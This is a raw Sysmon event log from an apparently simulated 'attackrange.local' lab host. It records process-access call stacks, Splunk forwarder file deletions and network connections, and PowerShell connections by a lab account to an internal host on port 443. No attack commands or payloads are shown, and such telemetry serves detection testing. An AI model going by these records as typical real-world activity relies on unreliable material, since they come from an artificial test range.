13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:28.800{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50360-false10.0.1.12-8000- 23542300x800000000000000036496061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:00.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740706D0340B432978E9684717A77151,SHA256=1DBABEBDA64F7436C3533BDFAC7DA64CC0B484B645629BA02DB2BAA581324C66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:30.485{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50361-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:02.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26F279CE981F858BC3128D36280628DD,SHA256=FB07CAEC72C27F209EC80C25416D61E11D60A0282FBD575E1FFB6DBEE22D673A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:03.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD2C0DBD3735E3F9D18412F282335850,SHA256=ABDED824BD35B115373220303C29368D77CAE2F2C86F573A0C42E296CD6182A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:04.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=098E9153AB392BD29243002718A55547,SHA256=969C6EDF038651F754399064C9AE78A1BB20213437EAA2A193BE84CF5EE45F2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:04.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57F0E50F8416BACD5FF261C52D79DBB,SHA256=DC477243AD124733F066CD61125C0A29E02E96AA4BF1B112E2E76CE4FCEE0F57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:35.495{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50363-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:34.817{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50362-false10.0.1.12-8000- 23542300x800000000000000036496066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:05.084{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE6BAFD69C6EAD2DD62B0BDFD96C920,SHA256=21C2D32183D51FA816AEB43FC6C28A0EBA83680AC380D6CAF7C01EB856500FDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:06.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA36D552F1C73FA4C2DFBF60273B87D,SHA256=515E390872356E1D3E7CE4E31C057504F0CD18686FB1507307FE1C19A8ED3373,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:07.135{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64B602E3C923FBDE053255776575D245,SHA256=0FF2FBE9139F08207F0319C923A621E4308D60D28580DCC1B9EC273F3309D0F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.928{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:08.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.925{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.925{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.909{B81B27B7-9F30-6140-4C56-04000000C801}4540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.378{B81B27B7-9F30-6140-4B56-04000000C801}61045644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.229{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 